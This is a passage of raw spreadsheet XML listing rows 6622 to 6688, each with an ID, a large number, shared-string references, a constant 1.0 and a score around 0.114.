        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6622" ht="15.75" customHeight="1">
      <c r="A6622" s="1">
        <v>23066.0</v>
      </c>
      <c r="B6622" s="2">
        <v>5.0442167E7</v>
      </c>
      <c r="C6622" s="2" t="s">
        <v>6302</v>
      </c>
      <c r="D6622" s="2">
        <v>1.0</v>
      </c>
      <c r="E6622" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6622" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6623" ht="15.75" customHeight="1">
      <c r="A6623" s="1">
        <v>23076.0</v>
      </c>
      <c r="B6623" s="2">
        <v>5.0508404E7</v>
      </c>
      <c r="C6623" s="2" t="s">
        <v>6303</v>
      </c>
      <c r="D6623" s="2">
        <v>1.0</v>
      </c>
      <c r="E6623" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6623" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6624" ht="15.75" customHeight="1">
      <c r="A6624" s="1">
        <v>23686.0</v>
      </c>
      <c r="B6624" s="2">
        <v>7000891.0</v>
      </c>
      <c r="C6624" s="2" t="s">
        <v>6304</v>
      </c>
      <c r="D6624" s="2">
        <v>1.0</v>
      </c>
      <c r="E6624" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6624" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6625" ht="15.75" customHeight="1">
      <c r="A6625" s="1">
        <v>23857.0</v>
      </c>
      <c r="B6625" s="2">
        <v>8251404.0</v>
      </c>
      <c r="C6625" s="2" t="s">
        <v>6305</v>
      </c>
      <c r="D6625" s="2">
        <v>1.0</v>
      </c>
      <c r="E6625" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6625" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6626" ht="15.75" customHeight="1">
      <c r="A6626" s="1">
        <v>24302.0</v>
      </c>
      <c r="B6626" s="2">
        <v>1.0572096E7</v>
      </c>
      <c r="C6626" s="2" t="s">
        <v>6306</v>
      </c>
      <c r="D6626" s="2">
        <v>1.0</v>
      </c>
      <c r="E6626" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6626" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6627" ht="15.75" customHeight="1">
      <c r="A6627" s="1">
        <v>24356.0</v>
      </c>
      <c r="B6627" s="2">
        <v>1.0730966E7</v>
      </c>
      <c r="C6627" s="2" t="s">
        <v>6307</v>
      </c>
      <c r="D6627" s="2">
        <v>1.0</v>
      </c>
      <c r="E6627" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6627" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6628" ht="15.75" customHeight="1">
      <c r="A6628" s="1">
        <v>24532.0</v>
      </c>
      <c r="B6628" s="2">
        <v>1.1208273E7</v>
      </c>
      <c r="C6628" s="2" t="s">
        <v>6308</v>
      </c>
      <c r="D6628" s="2">
        <v>1.0</v>
      </c>
      <c r="E6628" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6628" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6629" ht="15.75" customHeight="1">
      <c r="A6629" s="1">
        <v>24548.0</v>
      </c>
      <c r="B6629" s="2">
        <v>1.1263052E7</v>
      </c>
      <c r="C6629" s="2" t="s">
        <v>6280</v>
      </c>
      <c r="D6629" s="2">
        <v>1.0</v>
      </c>
      <c r="E6629" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6629" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6630" ht="15.75" customHeight="1">
      <c r="A6630" s="1">
        <v>24662.0</v>
      </c>
      <c r="B6630" s="2">
        <v>1.1526536E7</v>
      </c>
      <c r="C6630" s="2" t="s">
        <v>6281</v>
      </c>
      <c r="D6630" s="2">
        <v>1.0</v>
      </c>
      <c r="E6630" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6630" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6631" ht="15.75" customHeight="1">
      <c r="A6631" s="1">
        <v>25410.0</v>
      </c>
      <c r="B6631" s="2">
        <v>1.3779173E7</v>
      </c>
      <c r="C6631" s="2" t="s">
        <v>6309</v>
      </c>
      <c r="D6631" s="2">
        <v>1.0</v>
      </c>
      <c r="E6631" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6631" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6632" ht="15.75" customHeight="1">
      <c r="A6632" s="1">
        <v>25420.0</v>
      </c>
      <c r="B6632" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C6632" s="2" t="s">
        <v>6310</v>
      </c>
      <c r="D6632" s="2">
        <v>1.0</v>
      </c>
      <c r="E6632" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6632" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6633" ht="15.75" customHeight="1">
      <c r="A6633" s="1">
        <v>25857.0</v>
      </c>
      <c r="B6633" s="2">
        <v>1.4878802E7</v>
      </c>
      <c r="C6633" s="2" t="s">
        <v>6311</v>
      </c>
      <c r="D6633" s="2">
        <v>1.0</v>
      </c>
      <c r="E6633" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6633" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6634" ht="15.75" customHeight="1">
      <c r="A6634" s="1">
        <v>26211.0</v>
      </c>
      <c r="B6634" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C6634" s="2" t="s">
        <v>6312</v>
      </c>
      <c r="D6634" s="2">
        <v>1.0</v>
      </c>
      <c r="E6634" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6634" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6635" ht="15.75" customHeight="1">
      <c r="A6635" s="1">
        <v>26534.0</v>
      </c>
      <c r="B6635" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C6635" s="2" t="s">
        <v>6293</v>
      </c>
      <c r="D6635" s="2">
        <v>1.0</v>
      </c>
      <c r="E6635" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6635" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6636" ht="15.75" customHeight="1">
      <c r="A6636" s="1">
        <v>26832.0</v>
      </c>
      <c r="B6636" s="2">
        <v>1.8871735E7</v>
      </c>
      <c r="C6636" s="2" t="s">
        <v>6313</v>
      </c>
      <c r="D6636" s="2">
        <v>1.0</v>
      </c>
      <c r="E6636" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6636" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6637" ht="15.75" customHeight="1">
      <c r="A6637" s="1">
        <v>26972.0</v>
      </c>
      <c r="B6637" s="2">
        <v>1.9659996E7</v>
      </c>
      <c r="C6637" s="2" t="s">
        <v>6314</v>
      </c>
      <c r="D6637" s="2">
        <v>1.0</v>
      </c>
      <c r="E6637" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6637" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6638" ht="15.75" customHeight="1">
      <c r="A6638" s="1">
        <v>27008.0</v>
      </c>
      <c r="B6638" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C6638" s="2" t="s">
        <v>6315</v>
      </c>
      <c r="D6638" s="2">
        <v>1.0</v>
      </c>
      <c r="E6638" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6638" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6639" ht="15.75" customHeight="1">
      <c r="A6639" s="1">
        <v>27213.0</v>
      </c>
      <c r="B6639" s="2">
        <v>2.0966486E7</v>
      </c>
      <c r="C6639" s="2" t="s">
        <v>6316</v>
      </c>
      <c r="D6639" s="2">
        <v>1.0</v>
      </c>
      <c r="E6639" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6639" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6640" ht="15.75" customHeight="1">
      <c r="A6640" s="1">
        <v>27289.0</v>
      </c>
      <c r="B6640" s="2">
        <v>2.1243262E7</v>
      </c>
      <c r="C6640" s="2" t="s">
        <v>6317</v>
      </c>
      <c r="D6640" s="2">
        <v>1.0</v>
      </c>
      <c r="E6640" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6640" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6641" ht="15.75" customHeight="1">
      <c r="A6641" s="1">
        <v>27894.0</v>
      </c>
      <c r="B6641" s="2">
        <v>2.3659372E7</v>
      </c>
      <c r="C6641" s="2" t="s">
        <v>6318</v>
      </c>
      <c r="D6641" s="2">
        <v>1.0</v>
      </c>
      <c r="E6641" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6641" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6642" ht="15.75" customHeight="1">
      <c r="A6642" s="1">
        <v>27939.0</v>
      </c>
      <c r="B6642" s="2">
        <v>2.380863E7</v>
      </c>
      <c r="C6642" s="2" t="s">
        <v>6319</v>
      </c>
      <c r="D6642" s="2">
        <v>1.0</v>
      </c>
      <c r="E6642" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6642" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6643" ht="15.75" customHeight="1">
      <c r="A6643" s="1">
        <v>28614.0</v>
      </c>
      <c r="B6643" s="2">
        <v>2.7153433E7</v>
      </c>
      <c r="C6643" s="2" t="s">
        <v>6295</v>
      </c>
      <c r="D6643" s="2">
        <v>1.0</v>
      </c>
      <c r="E6643" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6643" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6644" ht="15.75" customHeight="1">
      <c r="A6644" s="1">
        <v>28695.0</v>
      </c>
      <c r="B6644" s="2">
        <v>2.7664868E7</v>
      </c>
      <c r="C6644" s="2" t="s">
        <v>6320</v>
      </c>
      <c r="D6644" s="2">
        <v>1.0</v>
      </c>
      <c r="E6644" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6644" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6645" ht="15.75" customHeight="1">
      <c r="A6645" s="1">
        <v>28756.0</v>
      </c>
      <c r="B6645" s="2">
        <v>2.8142623E7</v>
      </c>
      <c r="C6645" s="2" t="s">
        <v>6321</v>
      </c>
      <c r="D6645" s="2">
        <v>1.0</v>
      </c>
      <c r="E6645" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6645" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6646" ht="15.75" customHeight="1">
      <c r="A6646" s="1">
        <v>28943.0</v>
      </c>
      <c r="B6646" s="2">
        <v>2.9656343E7</v>
      </c>
      <c r="C6646" s="2" t="s">
        <v>6322</v>
      </c>
      <c r="D6646" s="2">
        <v>1.0</v>
      </c>
      <c r="E6646" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6646" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6647" ht="15.75" customHeight="1">
      <c r="A6647" s="1">
        <v>29016.0</v>
      </c>
      <c r="B6647" s="2">
        <v>3.0066979E7</v>
      </c>
      <c r="C6647" s="2" t="s">
        <v>6323</v>
      </c>
      <c r="D6647" s="2">
        <v>1.0</v>
      </c>
      <c r="E6647" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6647" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6648" ht="15.75" customHeight="1">
      <c r="A6648" s="1">
        <v>29205.0</v>
      </c>
      <c r="B6648" s="2">
        <v>3.0775512E7</v>
      </c>
      <c r="C6648" s="2" t="s">
        <v>6324</v>
      </c>
      <c r="D6648" s="2">
        <v>1.0</v>
      </c>
      <c r="E6648" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6648" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6649" ht="15.75" customHeight="1">
      <c r="A6649" s="1">
        <v>29479.0</v>
      </c>
      <c r="B6649" s="2">
        <v>3.2427722E7</v>
      </c>
      <c r="C6649" s="2" t="s">
        <v>6325</v>
      </c>
      <c r="D6649" s="2">
        <v>1.0</v>
      </c>
      <c r="E6649" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6649" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6650" ht="15.75" customHeight="1">
      <c r="A6650" s="1">
        <v>30014.0</v>
      </c>
      <c r="B6650" s="2">
        <v>3.61541E7</v>
      </c>
      <c r="C6650" s="2" t="s">
        <v>6326</v>
      </c>
      <c r="D6650" s="2">
        <v>1.0</v>
      </c>
      <c r="E6650" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6650" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6651" ht="15.75" customHeight="1">
      <c r="A6651" s="1">
        <v>30219.0</v>
      </c>
      <c r="B6651" s="2">
        <v>3.740005E7</v>
      </c>
      <c r="C6651" s="2" t="s">
        <v>6327</v>
      </c>
      <c r="D6651" s="2">
        <v>1.0</v>
      </c>
      <c r="E6651" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6651" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6652" ht="15.75" customHeight="1">
      <c r="A6652" s="1">
        <v>30379.0</v>
      </c>
      <c r="B6652" s="2">
        <v>3.8526531E7</v>
      </c>
      <c r="C6652" s="2" t="s">
        <v>6328</v>
      </c>
      <c r="D6652" s="2">
        <v>1.0</v>
      </c>
      <c r="E6652" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6652" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6653" ht="15.75" customHeight="1">
      <c r="A6653" s="1">
        <v>30555.0</v>
      </c>
      <c r="B6653" s="2">
        <v>4.0708122E7</v>
      </c>
      <c r="C6653" s="2" t="s">
        <v>6329</v>
      </c>
      <c r="D6653" s="2">
        <v>1.0</v>
      </c>
      <c r="E6653" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6653" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6654" ht="15.75" customHeight="1">
      <c r="A6654" s="1">
        <v>30796.0</v>
      </c>
      <c r="B6654" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C6654" s="2" t="s">
        <v>6330</v>
      </c>
      <c r="D6654" s="2">
        <v>1.0</v>
      </c>
      <c r="E6654" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6654" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6655" ht="15.75" customHeight="1">
      <c r="A6655" s="1">
        <v>30802.0</v>
      </c>
      <c r="B6655" s="2">
        <v>4.5216853E7</v>
      </c>
      <c r="C6655" s="2" t="s">
        <v>6331</v>
      </c>
      <c r="D6655" s="2">
        <v>1.0</v>
      </c>
      <c r="E6655" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6655" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6656" ht="15.75" customHeight="1">
      <c r="A6656" s="1">
        <v>30863.0</v>
      </c>
      <c r="B6656" s="2">
        <v>4.6177438E7</v>
      </c>
      <c r="C6656" s="2" t="s">
        <v>6331</v>
      </c>
      <c r="D6656" s="2">
        <v>1.0</v>
      </c>
      <c r="E6656" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6656" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6657" ht="15.75" customHeight="1">
      <c r="A6657" s="1">
        <v>31119.0</v>
      </c>
      <c r="B6657" s="2">
        <v>4.8803574E7</v>
      </c>
      <c r="C6657" s="2" t="s">
        <v>6332</v>
      </c>
      <c r="D6657" s="2">
        <v>1.0</v>
      </c>
      <c r="E6657" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6657" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6658" ht="15.75" customHeight="1">
      <c r="A6658" s="1">
        <v>31312.0</v>
      </c>
      <c r="B6658" s="2">
        <v>4969661.0</v>
      </c>
      <c r="C6658" s="2" t="s">
        <v>6333</v>
      </c>
      <c r="D6658" s="2">
        <v>1.0</v>
      </c>
      <c r="E6658" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6658" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6659" ht="15.75" customHeight="1">
      <c r="A6659" s="1">
        <v>31337.0</v>
      </c>
      <c r="B6659" s="2">
        <v>4.9781659E7</v>
      </c>
      <c r="C6659" s="2" t="s">
        <v>6334</v>
      </c>
      <c r="D6659" s="2">
        <v>1.0</v>
      </c>
      <c r="E6659" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6659" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6660" ht="15.75" customHeight="1">
      <c r="A6660" s="1">
        <v>31341.0</v>
      </c>
      <c r="B6660" s="2">
        <v>4.9807413E7</v>
      </c>
      <c r="C6660" s="2" t="s">
        <v>6335</v>
      </c>
      <c r="D6660" s="2">
        <v>1.0</v>
      </c>
      <c r="E6660" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6660" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6661" ht="15.75" customHeight="1">
      <c r="A6661" s="1">
        <v>31378.0</v>
      </c>
      <c r="B6661" s="2">
        <v>4995756.0</v>
      </c>
      <c r="C6661" s="2" t="s">
        <v>6336</v>
      </c>
      <c r="D6661" s="2">
        <v>1.0</v>
      </c>
      <c r="E6661" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6661" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6662" ht="15.75" customHeight="1">
      <c r="A6662" s="1">
        <v>32104.0</v>
      </c>
      <c r="B6662" s="2">
        <v>5.406267E7</v>
      </c>
      <c r="C6662" s="2" t="s">
        <v>6337</v>
      </c>
      <c r="D6662" s="2">
        <v>1.0</v>
      </c>
      <c r="E6662" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6662" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6663" ht="15.75" customHeight="1">
      <c r="A6663" s="1">
        <v>33010.0</v>
      </c>
      <c r="B6663" s="2">
        <v>6649178.0</v>
      </c>
      <c r="C6663" s="2" t="s">
        <v>6338</v>
      </c>
      <c r="D6663" s="2">
        <v>1.0</v>
      </c>
      <c r="E6663" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6663" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6664" ht="15.75" customHeight="1">
      <c r="A6664" s="1">
        <v>33120.0</v>
      </c>
      <c r="B6664" s="2">
        <v>7000890.0</v>
      </c>
      <c r="C6664" s="2" t="s">
        <v>6304</v>
      </c>
      <c r="D6664" s="2">
        <v>1.0</v>
      </c>
      <c r="E6664" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6664" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6665" ht="15.75" customHeight="1">
      <c r="A6665" s="1">
        <v>33459.0</v>
      </c>
      <c r="B6665" s="2">
        <v>7895341.0</v>
      </c>
      <c r="C6665" s="2" t="s">
        <v>6339</v>
      </c>
      <c r="D6665" s="2">
        <v>1.0</v>
      </c>
      <c r="E6665" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6665" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6666" ht="15.75" customHeight="1">
      <c r="A6666" s="1">
        <v>33865.0</v>
      </c>
      <c r="B6666" s="2">
        <v>9062391.0</v>
      </c>
      <c r="C6666" s="2" t="s">
        <v>6340</v>
      </c>
      <c r="D6666" s="2">
        <v>1.0</v>
      </c>
      <c r="E6666" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6666" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="6667" ht="15.75" customHeight="1">
      <c r="A6667" s="1">
        <v>8846.0</v>
      </c>
      <c r="B6667" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C6667" s="2" t="s">
        <v>6341</v>
      </c>
      <c r="D6667" s="2">
        <v>1.0</v>
      </c>
      <c r="E6667" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6667" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="6668" ht="15.75" customHeight="1">
      <c r="A6668" s="1">
        <v>21527.0</v>
      </c>
      <c r="B6668" s="2">
        <v>2.3392272E7</v>
      </c>
      <c r="C6668" s="2" t="s">
        <v>6342</v>
      </c>
      <c r="D6668" s="2">
        <v>1.0</v>
      </c>
      <c r="E6668" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6668" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="6669" ht="15.75" customHeight="1">
      <c r="A6669" s="1">
        <v>23089.0</v>
      </c>
      <c r="B6669" s="2">
        <v>5.0684901E7</v>
      </c>
      <c r="C6669" s="2" t="s">
        <v>6343</v>
      </c>
      <c r="D6669" s="2">
        <v>1.0</v>
      </c>
      <c r="E6669" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6669" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="6670" ht="15.75" customHeight="1">
      <c r="A6670" s="1">
        <v>25825.0</v>
      </c>
      <c r="B6670" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C6670" s="2" t="s">
        <v>6344</v>
      </c>
      <c r="D6670" s="2">
        <v>1.0</v>
      </c>
      <c r="E6670" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6670" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="6671" ht="15.75" customHeight="1">
      <c r="A6671" s="1">
        <v>26105.0</v>
      </c>
      <c r="B6671" s="2">
        <v>1.5771447E7</v>
      </c>
      <c r="C6671" s="2" t="s">
        <v>6345</v>
      </c>
      <c r="D6671" s="2">
        <v>1.0</v>
      </c>
      <c r="E6671" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6671" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="6672" ht="15.75" customHeight="1">
      <c r="A6672" s="1">
        <v>27996.0</v>
      </c>
      <c r="B6672" s="2">
        <v>2.4224602E7</v>
      </c>
      <c r="C6672" s="2" t="s">
        <v>6207</v>
      </c>
      <c r="D6672" s="2">
        <v>1.0</v>
      </c>
      <c r="E6672" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6672" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="6673" ht="15.75" customHeight="1">
      <c r="A6673" s="1">
        <v>24689.0</v>
      </c>
      <c r="B6673" s="2">
        <v>1.1629001E7</v>
      </c>
      <c r="C6673" s="2" t="s">
        <v>6346</v>
      </c>
      <c r="D6673" s="2">
        <v>1.0</v>
      </c>
      <c r="E6673" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6673" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="6674" ht="15.75" customHeight="1">
      <c r="A6674" s="1">
        <v>26216.0</v>
      </c>
      <c r="B6674" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C6674" s="2" t="s">
        <v>6347</v>
      </c>
      <c r="D6674" s="2">
        <v>1.0</v>
      </c>
      <c r="E6674" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6674" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="6675" ht="15.75" customHeight="1">
      <c r="A6675" s="1">
        <v>31549.0</v>
      </c>
      <c r="B6675" s="2">
        <v>5114526.0</v>
      </c>
      <c r="C6675" s="2" t="s">
        <v>6348</v>
      </c>
      <c r="D6675" s="2">
        <v>1.0</v>
      </c>
      <c r="E6675" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6675" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="6676" ht="15.75" customHeight="1">
      <c r="A6676" s="1">
        <v>23412.0</v>
      </c>
      <c r="B6676" s="2">
        <v>5599274.0</v>
      </c>
      <c r="C6676" s="2" t="s">
        <v>6217</v>
      </c>
      <c r="D6676" s="2">
        <v>1.0</v>
      </c>
      <c r="E6676" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6676" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="6677" ht="15.75" customHeight="1">
      <c r="A6677" s="1">
        <v>23941.0</v>
      </c>
      <c r="B6677" s="2">
        <v>8805643.0</v>
      </c>
      <c r="C6677" s="2" t="s">
        <v>6349</v>
      </c>
      <c r="D6677" s="2">
        <v>1.0</v>
      </c>
      <c r="E6677" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6677" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="6678" ht="15.75" customHeight="1">
      <c r="A6678" s="1">
        <v>30771.0</v>
      </c>
      <c r="B6678" s="2">
        <v>4.4577189E7</v>
      </c>
      <c r="C6678" s="2" t="s">
        <v>6350</v>
      </c>
      <c r="D6678" s="2">
        <v>1.0</v>
      </c>
      <c r="E6678" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6678" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="6679" ht="15.75" customHeight="1">
      <c r="A6679" s="1">
        <v>32376.0</v>
      </c>
      <c r="B6679" s="2">
        <v>5607067.0</v>
      </c>
      <c r="C6679" s="2" t="s">
        <v>6351</v>
      </c>
      <c r="D6679" s="2">
        <v>1.0</v>
      </c>
      <c r="E6679" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6679" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="6680" ht="15.75" customHeight="1">
      <c r="A6680" s="1">
        <v>34039.0</v>
      </c>
      <c r="B6680" s="2">
        <v>9567498.0</v>
      </c>
      <c r="C6680" s="2" t="s">
        <v>6352</v>
      </c>
      <c r="D6680" s="2">
        <v>1.0</v>
      </c>
      <c r="E6680" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6680" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="6681" ht="15.75" customHeight="1">
      <c r="A6681" s="1">
        <v>15284.0</v>
      </c>
      <c r="B6681" s="2">
        <v>4.2411433E7</v>
      </c>
      <c r="C6681" s="2" t="s">
        <v>6353</v>
      </c>
      <c r="D6681" s="2">
        <v>1.0</v>
      </c>
      <c r="E6681" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6681" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="6682" ht="15.75" customHeight="1">
      <c r="A6682" s="1">
        <v>31193.0</v>
      </c>
      <c r="B6682" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C6682" s="2" t="s">
        <v>6354</v>
      </c>
      <c r="D6682" s="2">
        <v>1.0</v>
      </c>
      <c r="E6682" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6682" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="6683" ht="15.75" customHeight="1">
      <c r="A6683" s="1">
        <v>31310.0</v>
      </c>
      <c r="B6683" s="2">
        <v>4969625.0</v>
      </c>
      <c r="C6683" s="2" t="s">
        <v>6355</v>
      </c>
      <c r="D6683" s="2">
        <v>1.0</v>
      </c>
      <c r="E6683" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6683" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="6684" ht="15.75" customHeight="1">
      <c r="A6684" s="1">
        <v>23149.0</v>
      </c>
      <c r="B6684" s="2">
        <v>5.1760265E7</v>
      </c>
      <c r="C6684" s="2" t="s">
        <v>6231</v>
      </c>
      <c r="D6684" s="2">
        <v>1.0</v>
      </c>
      <c r="E6684" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6684" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="6685" ht="15.75" customHeight="1">
      <c r="A6685" s="1">
        <v>16566.0</v>
      </c>
      <c r="B6685" s="2">
        <v>4.6868032E7</v>
      </c>
      <c r="C6685" s="2" t="s">
        <v>6356</v>
      </c>
      <c r="D6685" s="2">
        <v>1.0</v>
      </c>
      <c r="E6685" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6685" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="6686" ht="15.75" customHeight="1">
      <c r="A6686" s="1">
        <v>22936.0</v>
      </c>
      <c r="B6686" s="2">
        <v>4.8721766E7</v>
      </c>
      <c r="C6686" s="2" t="s">
        <v>6357</v>
      </c>
      <c r="D6686" s="2">
        <v>1.0</v>
      </c>
      <c r="E6686" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6686" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="6687" ht="15.75" customHeight="1">
      <c r="A6687" s="1">
        <v>24420.0</v>
      </c>
      <c r="B6687" s="2">
        <v>1.0849949E7</v>
      </c>
      <c r="C6687" s="2" t="s">
        <v>6358</v>
      </c>
      <c r="D6687" s="2">
        <v>1.0</v>
      </c>
      <c r="E6687" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6687" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="6688" ht="15.75" customHeight="1">
      <c r="A6688" s="1">
        <v>25565.0</v>
      </c>
      <c r="B6688" s="2">
        <v>1.4302612E7</v>
      </c>
      <c r="C6688" s="2" t="s">
        <v>6359</v>
      </c>
      <c r="D6688" s="2">
        <v>1.0</v>
      </c>
      <c r="E6688" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6688" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
